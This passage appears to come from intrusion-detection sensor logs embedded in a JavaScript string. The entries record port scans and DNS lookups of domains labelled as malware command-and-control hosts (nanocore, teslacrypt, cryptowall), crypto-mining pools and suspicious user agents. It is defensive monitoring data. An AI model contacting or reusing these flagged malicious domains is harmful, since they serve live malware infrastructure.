457,41461,41463,41465,41469,41474,41476,41479,41482,41964,42120,42122,42124,42125,42128,42129,42130,42131,42132,42133,42134,42136,42137,42138,42141,42142,42145,42146,42147,42150,42151,42152,42154,42157,42159,42161,42162,42163,42164,42165,42166,42167,42168,42171,42172,42173,42239,42241,42242,42248,42249,42254,42257,42263,42264,42266,42267,42322,42323,42326,42331,42337,42338,42341,42345,42349,42353,42354,42356,42357,42359,42360,42362,42363,42365,42366,42369,42371,42377,42379,42380,42383,42385,42386,42388,42389,42393,42399,42461,42463,42464,42481,42483,42484,42487,42488,42491,42497,42500,42503,42506,42528,42747 2.200.110.129,2.200.110.134,2.200.110.150,2.200.110.153,2.200.110.157,2.200.110.158,2.200.110.162,2.200.110.163,2.200.110.17,2.200.110.175,2.200.110.178,2.200.110.186,2.200.110.187,2.200.110.194,2.200.110.200,2.200.110.204,2.200.110.205,2.200.110.207,2.200.110.209,2.200.110.214,2.200.110.216,2.200.110.222,2.200.110.225,2.200.110.228,2.200.110.232,2.200.110.233,2.200.110.234,2.200.110.237,2.200.110.240,2.200.110.241,2.200.110.245,2.200.110.246,2.200.110.247,2.200.110.250,2.200.110.251,2.200.110.252,2.200.110.254,2.200.110.49,2.200.110.50 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:59:20.000062" r2d2 91.123.157.56 13619,13625,13629,13633,13637,13645,13649,13654,13658,13662,13703,13794,13805,13815,13825,13829,13841,13845,16403,16423,16424,16445,16833,16841,16870,16883,16888,16913,16938,16965,17014,17015,17016,17493,19093,22023,22076,22111,22127,22210,22212,22215,22216,22219,22220,22234,22238,22241,22242,22243,22245,22284,22377,22436,23108,25650,25671,25683,25714,25754,25766,25822,25837,25863,25905,25933,26251,26253,26281,26283,26304,26308,26315,26321,26325,26329,26333,26337,26350,26355,26368,26384,26402,26416,26466,26473,26485,26503,26543,26549,26577,26612,26642,26644,26646,26650,26652,26655,26658,26659,26662,26666,26670,26743,26777,26913,26914,26918,26919,26920,26938,26944,26949,26955,26958,26961,26963,26966,26968,26972,26975,26976,26980,26984,26985,26989,26993,27000,27006,27354,27356,27358,27361,27362,27364,27367,27372,27373,27376,27377,27382,27550,27616,27648,27835,28029,28114,28147,28265,28294,28327,28339,28348,28352,28357,28360,28426,28432,28434,28487,28507,29021,29163,29236,29364,29503,30239,30241,30242,30314,30368,30495,30541,30598,30729,30930,32705,33512,36867,37061,39227,39232,39263,39284,39285,39286,39287,39288,39289,39291,39292,39294,39295,39312,39315,39316,39317,39318,39319,39320,39321,39322,39323,39325,39327,39329,39330,39332,39333,39334,39335,39336,39337,39338,39339,39340,39376,39377,39378,39379,39381,39384,39385,39387,39388,39389,39390,39391,39393,39395,39396,39398,39399,39400,39403,39411,39415,39424,39431,39433,39437,39439,39440,39443,39444,39446,39451,39454,39459,39496,39505,39506,39507,39508,39510,39511,39513,39514,39516,39517,39518,39519,39520,39582,39584,39587,39588,39592,39593,39600,39603,39608,39617,39622,39680,39687,39689,39693,39711,39719,39722,39723,39738,39754,39755,39761,39763,39773,39780,39781,39782,39783,39785,39786,39788,39801,39809,40349,40351,40352,40353,40356,40359,40360,40361,40364,40365,40372,40551,40558,40560,40564,40568,40569,40572,40574,40575,40577,40579,40582,40681,40683,40691,40692,40695,40698,40704,40708,40709,40714,40729,40731,40733,40734,40735,40737,40740,40741,40743,40746,40749,40752,40754,40757,40759,40764,40786,40811,40812,40813,40815,40819,40820,40821,40822,40823,40824,40825,40826,40830,40831,40832,40841,40844,40848,40855,40856,40858,40859,40861,40862,40863,40864,40865,40867,40868,40869,40870,40871,40872,40891,40896,40897,40901,40903,40904,40905,40907,40909,40911,40912,40917,40960,41264,41292,41295,41298,41302,41306,41310,41319,41325,41328,41331,41338,41341,41353,41357,41364,41366,41371,41373,41376,41383,41385,41388,41391,41393,41396,41398,41404,41406,41409,41411,41414,41415,41417,41419,41436,41438,41442,41445,41447,41449,41452,41457,41459,41461,41463,41465,41469,41471,41474,41476,41482,41485,41487,41490,41493,41500,41503,41508,41511,41512,41515,41518,41520,41523,42064,42065,42066,42067,42068,42070,42072,42073,42075,42083,42084,42136,42137,42138,42141,42143,42146,42147,42150,42151,42152,42154,42156,42157,42159,42161,42162,42163,42164,42165,42166,42167,42168,42169,42170,42171,42172,42173,42174,42175,42176,42177,42178,42180,42182,42192,42197,42206,42208,42210,42239,42241,42242,42246,42248,42249,42254,42257,42258,42263,42264,42266,42267,42322,42323,42326,42334,42337,42338,42341,42345,42347,42351,42353,42354,42356,42359,42360,42362,42363,42365,42366,42368,42369,42371,42373,42375,42377,42379,42380,42383,42385,42388,42389,42391,42393,42396,42399,42461,42463,42464,42610 2.200.110.127,2.200.110.141,2.200.110.147,2.200.110.152,2.200.110.155,2.200.110.158,2.200.110.162,2.200.110.163,2.200.110.166,2.200.110.167,2.200.110.171,2.200.110.175,2.200.110.176,2.200.110.177,2.200.110.180,2.200.110.184,2.200.110.189,2.200.110.190,2.200.110.194,2.200.110.195,2.200.110.196,2.200.110.197,2.200.110.199,2.200.110.200,2.200.110.205,2.200.110.207,2.200.110.209,2.200.110.212,2.200.110.214,2.200.110.222,2.200.110.224,2.200.110.225,2.200.110.228,2.200.110.232,2.200.110.235,2.200.110.240,2.200.110.241,2.200.110.243,2.200.110.244,2.200.110.245,2.200.110.247,2.200.110.250,2.200.110.251,2.200.110.254,2.200.110.255,2.200.111.211,2.200.111.93 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:59:30.558251" r2d2 2.200.107.146 48736 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:59:30.556775" r2d2 2.200.110.232 65415 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:59:30.594899" r2d2 2.200.110.233 63740 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:59:21.000545" r2d2 91.123.157.56 13619,13622,13625,13633,13641,13645,13651,13654,13658,13662,13703,13801,13805,13820,13825,13841,13845,16403,16423,16424,16440,16445,16833,16841,16870,16883,16887,16888,16909,16934,16938,16965,17015,17016,26742,26748,26751,26757,26758,26761,26762,26766,26767,26770,26773,26785,26789,28339,28432,28434,28487,29163,29236,29364,29503,29536,30239,30242,30465,37583,38151,38192,38226,38303,38649,38655,39227,39263,39284,39285,39288,39289,39291,39292,39294,39295,39296,39359,39361,39362,39363,39365,39366,39368,39369,39370,39371,39372,39373,39375,39393,39394,39395,39396,39397,39398,39399,39400,39403,39405,39411,39415,39418,39424,39485,39489,39491,39492,39494,39495,39496,39497,39499,39500,39501,39502,39504,39578,39816,39822,39826,39844,39850,39856,39862,39867,39877,39883,39890,39935,40005,40551,40558,40560,40564,40568,40569,40571,40574,40575,40577,40579,40581,40582,40609,40611,40614,40615,40619,40621,40626,40629,40637,40642,40647,40665,40678,40681,40683,40691,40695,40698,40702,40704,40708,40709,40713,40714,40719,40729,40731,40734,40735,40737,40741,40743,40746,40752,40754,40757,40759,40811,40812,40815,40816,40817,40819,40820,40821,40822,40823,40824,40825,40830,40832,40834,40841,40842,40844,40848,40855,40862,40867,40878,40885,40891,40895,40897,40901,40903,40905,40907,40909,40911,40916,40917,40918,40960,40961,40962,40963,40964,40965,40968,40973,40974,40978,40979,40983,40990,41002,41011,41015,41017,41022,41026,41032,41033,41034,41036,41037,41038,41041,41048,41053,41069,41081,41083,41087,41092,41097,41102,41110,41111,41116,41117,41122,41126,41128,41130,41132,41133,41159,41165,41179,41182,41185,41192,41198,41202,41208,41210,41211,41259,41264,41267,41292,41295,41298,41302,41306,41310,41314,41319,41325,41331,41334,41393,41398,41404,41406,41414,41415,41417,41419,41436,41438,41442,41445,41447,41449,41452,41461,41463,41465,41469,41471,41474,41476,41479,41482,42010,42012,42013,42014,42015,42016,42022,42023,42024,42026,42027,42085,42086,42087,42089,42090,42091,42094,42095,42096,42097,42099,42120,42121,42122,42124,42125,42127,42128,42129,42131,42132,42133,42135,42157,42159,42161,42162,42163,42164,42165,42166,42167,42168,42170,42171,42172,42173,42241,42242,42246,42248,42249,42252,42254,42257,42260,42263,42264,42266,42267,42269,42270,42274,42276,42277,42279,42280,42287,42291,42293,42294,42297,42298,42300,42301,42303,42308,42311,42314,42316,42318,42319,42320,42322,42323,42326,42334,42337,42338,42341,42342,42345,42347,42353,42354,42356,42357,42359,42360,42365,42369,42371,42373,42375,42377,42379,42380,42383,42385,42386,42388,42389,42393,42399,42453,42461,42463,42464 2.200.110.130,2.200.110.144,2.200.110.151,2.200.110.152,2.200.110.153,2.200.110.155,2.200.110.161,2.200.110.162,2.200.110.175,2.200.110.182,2.200.110.184,2.200.110.195,2.200.110.199,2.200.110.200,2.200.110.203,2.200.110.204,2.200.110.206,2.200.110.208,2.200.110.209,2.200.110.214,2.200.110.215,2.200.110.216,2.200.110.220,2.200.110.222,2.200.110.223,2.200.110.225,2.200.110.228,2.200.110.233,2.200.110.240,2.200.110.241,2.200.110.244,2.200.110.245,2.200.110.246,2.200.110.247,2.200.110.251,2.200.110.254 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:59:28.000586" r2d2 91.123.157.56 17493,19093,22023,22076,22111,22127,22208,22241,22284,22436,23108,23449,23453,23457,23466,23472,23477,23481,23490,23495,23500,25532,39297,39298,39299,39300,39301,39302,39303,39305,39306,39310,39311,39314,39315,39316,39317,39319,39320,39321,39322,39323,39324,39325,39327,39359,39361,39362,39363,39364,39365,39368,39369,39370,39371,39372,39373,39374,39376,39377,39378,39381,39383,39384,39385,39387,39388,39389,39391,39582,39584,39587,39592,39595,39600,39603,39605,39608,39617,39620,39687,39719,39723,39742,39751,39761,39773,39780,39782,39786,39801,39803,39809,39959,39962,39965,39968,39971,39976,39979,39982,39985,39988,39991,39994,39996,40521,40522,40525,40526,40529,40532,40534,40544,40548,40551,40553,40558,40560,40564,40566,40568,40569,40577,40579,40581,40582,40681,40683,40691,40692,40695,40699,40703,40704,40706,40708,40709,40711,40713,40714,40716,40718,40722,40723,40726,40727,40729,40730,40734,40785,40895,40896,40897,40901,40903,40904,40905,40907,40910,40911,40912,40916,40917,40918,42120,42121,42122,42124,42125,42128,42129,42131,42132,42133,42134,42135,42159,42162,42163,42164,42165,42166,42167,42168,42171,42172,42173,42270,42273,42274,42276,42277,42279,42282,42287,42291,42293,42294,42890,42892,42894,42896,42904,42906,42908,42910,42912,42918,42924 2.200.110.148,2.200.110.152,2.200.110.153,2.200.110.155,2.200.110.162,2.200.110.172,2.200.110.190,2.200.110.195,2.200.110.196,2.200.110.202,2.200.110.203,2.200.110.205,2.200.110.207,2.200.110.220,2.200.110.224,2.200.110.239,2.200.111.185,2.200.111.83 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:59:29.000048" r2d2 91.123.157.56 13619,13625,13629,13645,13649,13651,13654,13658,13662,13675,13703,39312,39313,39315,39316,39317,39318,39319,39321,39322,39323,39324,39325,39327,39900,39906,39916,39922,39923,39926,39929,39932,39942,39948,39951,39953,42085,42086,42087,42088,42089,42090,42091,42092,42094,42096,42097,42098,42099,42241,42242,42248,42249,42252,42254,42257,42258,42264,42266,42267 2.200.110.144,2.200.110.200,2.200.110.205,2.200.110.214,2.200.110.230 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:59:34.000043" r2d2 91.123.157.56 39227,39232,39263,39284,39285,39286,39288,39289,39291,39292,39294,39295,39314,39315,39316,39319,39320,39321,39322,39323,39324,39325,39327,39376,39377,39378,39381,39384,39385,39386,39387,39388,39389,39391,39485,39486,39489,39491,39494,39497,39498,39499,39500,39501,39502,39504,40733,40735,40741,40743,40746,40749,40752,40757,40759,40764,40895,40896,40901,40904,40905,40907,40909,40911,40912,40916,40918,41264,41287,41295,41298,41302,41306,41310,41314,41319,41322,41331,41338,44779,44781,44788,45036,45041,45045,45047,45049,45051,45053,45055 2.200.110.175,2.200.110.195,2.200.110.199,2.200.110.205,2.200.110.224,2.200.110.240,2.200.110.246,2.200.111.204 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:59:59.608472" r2d2 2.200.110.232 64068 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:00:11.771527" r2d2 2.200.105.226 60124 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:00:11.771585" r2d2 2.200.105.226 60124 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:00:11.771640" r2d2 2.200.105.226 60124 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:00:11.802075" r2d2 2.200.105.226 59391 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:00:11.802083" r2d2 2.200.105.226 59391 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:00:37.812748" r2d2 2.200.110.232 64184 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:00:37.814435" r2d2 2.200.107.146 1991 192.26.92.30 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:00:37.839445" r2d2 2.200.110.233 64513 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:00:38.040453" r2d2 2.200.107.146 3199 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:00:38.038991" r2d2 2.200.110.232 63489 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:00:38.090242" r2d2 2.200.110.233 65363 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:00:40.605835" r2d2 2.200.110.232 49425 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:00:40.634034" r2d2 2.200.110.233 64800 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:00:41.819488" r2d2 2.200.110.232 64020 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:01:03.587242" r2d2 10.1.19.42 59501 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:01:21.338014" r2d2 10.44.70.211 51785 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:01:43.166518" r2d2 2.200.110.232 64521 2.200.107.168 53 UDP DNS (td-username-db4-63-169).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 03:01:43.385680" r2d2 2.200.110.232 64812 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:01:43.387354" r2d2 2.200.107.146 40243 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:01:43.403508" r2d2 2.200.110.232 64007 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:01:50.633384" r2d2 2.200.110.233 63844 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:02:25.297633" r2d2 2.200.105.226 58034 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:02:32.558768" r2d2 10.44.70.211 51796 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:02:37.167723" r2d2 2.200.110.232 64562 2.200.107.168 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:02:37.169290" r2d2 2.200.107.146 29527 205.251.195.176 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:02:37.559246" r2d2 10.3.160.42 23391 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:02:37.658938" r2d2 10.3.160.42 23391 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:02:37.759055" r2d2 10.3.160.42 23391 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:02:37.962526" r2d2 10.3.160.42 23391 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:02:46.472846" r2d2 2.200.97.1 53016 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:02:50.753273" r2d2 10.1.19.42 59502 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:02:59.609826" r2d2 2.200.107.146 50290 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:03:08.784089" r2d2 74.102.39.43 59629 2.200.110.157 80 TCP UA XTC "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:03:08.784131" r2d2 74.102.39.43 59629 2.200.110.157 80 TCP UA XTC "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:03:25.413386" r2d2 2.200.110.233 65478 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:03:32.000123" r2d2 2.200.108.59 10438,10440,10443,10448,10449,10453,10456,10459,10461,10462,10463,10468,10469,10470,10475,10480,10482,10486,10488,10493,10497,10503,10504,10505,10506,10508,10510,10516,10517,10519,10521,10524,10527,10528,10529,10530,10532,33074,33274,33324,33344,34000,34592,34694,34800,34878,34980,35194,35226,35420,35812,35910,35966,36070,36474,36722,37002,37220,37612,37948,38158,38432,38524,38650,38678,38720,38882,38916,39290,39900,39980,40372,40450,40630,40674,40676,40734,40776,40798,41000,41020,41208,41392,41436,41446,41458,41466,41522,41602,41630,41634,41637,41638,41639,41640,41645,41646,41648,41672,41746,41818,41928,42088,42180,42246,42966,43680,44140,44182,44574,44640,44704,44868,44910,45012,45428,45754,46006,46684,46700,46810,46944,47060,47576,47666,47715,47716,47717,47720,47723,47724,47725,47727,47728,47729,48220,48416,48794,49056,49094,49522,49714,49806,50284,50382,50446,50980,51058,51282,51344,51578,51682,51838,51888,51960,52008,52158,52916,52968,53212,54156,54162,54178,54724,54738,54794,54904,55146,55274,55372,55856,55952,56026,56168,56354,56548,56902,57402,57474,57666,57698,57742,57906,58080,58104,58120,58892,59304,59712,59824,59894,60146,60372,60476,60504,60914 77.53.81.105 21,6456,6562,6865,7186,7472,7711,8063,8825,9281,9322,9343,9557,9856,9889,10081,10916,11673,12817,13008,13581,14114,14441,15561,18633,18853,19655,19768,20384,20688,20697,21389,22048,22051,22248,22359,23552,23668,23715,24743,25530,25553,25756,25834,26151,26453,27465,28207,28246,28267,28302,28547,28925,28949,29762,31012,31199,31497,32460,32497,33071,33225,33474,33550,33986,34366,34961,35386,36121,36186,36630,36643,37090,40653,41267,41741,41992,42053,42265,42390,42981,43077,43262,43711,44146,44321,44793,45588,45605,46023,47185,48104,48435,48786,49642,49679,49734,50460,50836,50890,51052,51301,51357,51627,51741,52613,52685,53542,54016,54247,54391,55030,55259,55365,55658,56292,56354,56715,57230,57739,57759,57981,58038,58812,59596,59885,60577,60777,61621,62122,63310,63326,63444,63541,63593,63601,64054,64206,64290,64802,65164,65274 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:03:32.000058" r2d2 2.200.108.59 10439,10442,10443,10444,10445,10446,10450,10451,10453,10454,10455,10456,10457,10458,10459,10460,10461,10462,10464,10467,10469,10471,10472,10475,10477,10478,10480,10481,10483,10484,10485,10486,10487,10488,10490,10491,10494,10497,10498,10500,10502,10503,10506,10508,10511,10512,10513,10514,10516,10519,10520,10521,10522,10524,10525,10526,10529,10530,10531,10533,10536,10537,10543,10545,33060,33074,33134,33388,33432,33576,33650,34088,34290,34324,34414,34624,34694,34878,34980,35098,35488,35584,35724,35812,35978,36002,36944,37002,37210,37304,37612,37698,37748,38056,38440,38560,38650,38720,38734,38858,38870,38882,38916,38994,39036,39094,39290,39900,39980,40014,40116,40372,40402,40450,40588,40614,40734,40776,40798,41194,41208,41388,41392,41446,41630,41635,41636,41640,41641,41643,41644,41647,41648,41649,41650,41652,41653,41702,41742,41818,41876,42088,42160,42180,42488,42966,43810,43914,44274,44574,44640,44650,44868,44910,45006,45012,45122,45154,45478,45512,45514,45612,46006,46574,46700,47060,47098,47202,47286,47430,47666,47714,47715,47719,47720,47721,47722,47728,47870,48100,48602,48674,48794,49092,49714,50284,50352,50480,50574,50576,50800,50980,51058,51074,51090,51322,51344,51446,51490,51578,51900,51916,51940,51960,52438,52636,52916,53242,53356,53604,53686,53754,53960,54198,54384,54478,54530,54724,54738,54792,55008,55274,55426,55470,55604,56168,56902,57018,57130,57402,57666,57818,58044,58080,58104,58724,58734,58892,58914,59400,59454,59650,60436,60470,60542,60620 77.53.81.105 21,5144,5767,6158,6541,6562,6736,7711,8886,9441,9557,9977,10081,11134,11181,11516,11645,11673,12052,12897,13453,13581,13731,14963,15208,15288,15310,15534,15561,15941,15947,16511,16554,16772,16839,16898,18467,18633,19089,19103,19135,19367,19666,19768,19820,19980,20697,21389,21603,22048,22756,22917,23715,23925,24779,25131,25553,25756,25857,26476,26918,27465,27491,28207,28246,28267,28302,28537,28659,28735,29329,29762,29801,30035,30662,31048,31286,31300,32994,33071,33225,33333,33366,33382,33474,33986,34297,34366,34961,35386,36102,36448,36992,37333,37528,38515,38931,39105,39340,40177,40653,40771,41001,41069,41699,42390,43711,43846,44146,44321,45478,47149,47233,47618,47798,47993,48104,48435,48642,48786,49130,49240,49679,49884,50460,51044,52613,52685,53119,53542,53960,54016,54247,54643,54659,54893,54950,55030,55099,56354,57230,57686,58963,59861,59885,59988,60474,60556,60577,60777,61039,61621,62218,62340,62459,62561,63310,63753,63811,63981,64054,64206,64290,65107 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:03:32.000136" r2d2 2.200.108.59 10438,10440,10441,10445,10446,10447,10448,10451,10452,10454,10464,10465,10466,10467,10470,10472,10473,10474,10476,10479,10483,10485,10489,10491,10492,10493,10494,10495,10496,10498,10499,10500,10501,10505,10507,10509,10511,10513,10514,10515,10518,10522,10523,10527,10532,10534,10535,10538,10540,10541,10545,10546,10548,10549,10551,10552,10553,10554,33134,33274,33432,33576,34004,34088,34290,34738,35142,35194,35514,35730,35812,35910,35978,36002,36072,36120,36128,36430,36722,36944,37210,37220,37304,37332,37568,37698,37748,37948,38056,38140,38432,38524,38710,38734,38928,38966,39036,39226,39870,39916,40116,40136,40242,40248,40402,40630,40676,40938,41000,41194,41466,41602,41630,41633,41635,41637,41638,41642,41645,41651,41653,41654,41746,42142,42442,42488,42734,43108,43280,43578,43680,43810,43928,44140,44280,44446,44650,44750,45154,45356,45588,45612,45754,46082,46252,46574,47098,47717,47718,47723,47725,47726,47728,47730,47731,47733,47734,48416,48602,49054,49188,49522,49856,49870,49896,50382,50480,50808,51090,51118,51264,51282,51322,51332,51446,51674,51682,51900,51916,51970,52036,52158,52362,52438,52952,53204,53212,53242,53356,53404,53976,54156,54162,54178,54198,54234,54384,54478,54556,54904,55116,55372,55474,55856,55952,55988,56232,56354,56548,56938,57018,57130,57320,57410,57416,57698,57748,57844,58044,58120,58734,58914,58922,59304,59400,59894,60436,60470,60476,60504,60534,60542,60544,60620,60630,60914 77.53.81.105 21,5144,6158,6456,6541,6736,6865,7314,7352,8063,9343,9360,9441,9889,9977,10916,11153,11177,11396,11856,12052,12897,13008,13731,13994,14726,14951,15310,15332,15534,15773,15941,15947,16212,16258,16511,16554,17004,18853,19367,19659,19817,19980,20203,20384,20688,21603,21829,22248,22756,22805,22917,23213,23552,23612,23668,24743,24779,25336,25436,25834,25857,26151,26918,28537,28925,28949,30471,30662,32236,32497,32572,33377,33382,33446,33501,34021,34922,35544,36448,36643,37201,37333,37430,37528,38680,38931,38938,39601,40015,40177,40225,40251,40723,40771,41001,41069,41390,41560,41741,41827,42053,42265,42743,42981,43077,43262,43846,45478,45605,45665,46541,46726,46806,47798,47939,47993,49642,49869,50185,50278,51044,51052,51122,51301,51349,51741,54391,54618,54893,54950,55099,55259,56292,56710,56715,57471,57516,57686,57759,58038,58064,59596,59988,60474,61289,61470,62082,62122,62561,62591,62956,63326,63753,63833,63981,64259,64706,65129,65223 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:03:43.391364" r2d2 2.200.110.232 49240 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:03:43.393856" r2d2 2.200.107.146 25094 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:03:37.000557" r2d2 2.200.108.59 10535,10537,10538,10539,10540,10542,10543,10544,10546,10547,33872,35514,38140,38928,39916,39938,41651,44026,44274,46474,47260,47731,47732,47733,48100,48926,50576,51264,51490,51970,52058,57410 77.53.81.105 21,10164,11856,16772,19817,32028,32572,38515,38680,39105,40251,41956,46726,49816,51690,55739,60564,62340,63833 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:04:00.869152" r2d2 178.17.174.14 33402 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MDDR; BRI/2; BOIE8;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:04:08.108578" r2d2 2.200.110.233 49275 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:04:10.636022" r2d2 2.200.110.232 63469 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:04:10.663627" r2d2 2.200.110.233 65183 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:04:39.796018" r2d2 10.3.160.42 30883 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:04:39.899544" r2d2 10.3.160.42 30883 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:04:40.094555" r2d2 10.3.160.42 30883 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:04:40.394508" r2d2 10.3.160.42 30883 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:04:41.294626" r2d2 10.3.160.42 30883 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:04:43.383463" r2d2 2.200.110.232 64615 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:04:43.385329" r2d2 2.200.107.146 41250 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:05:20.667898" r2d2 2.200.110.232 65010 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:05:20.672896" r2d2 2.200.107.146 23135 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:05:20.700163" r2d2 2.200.110.233 63401 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
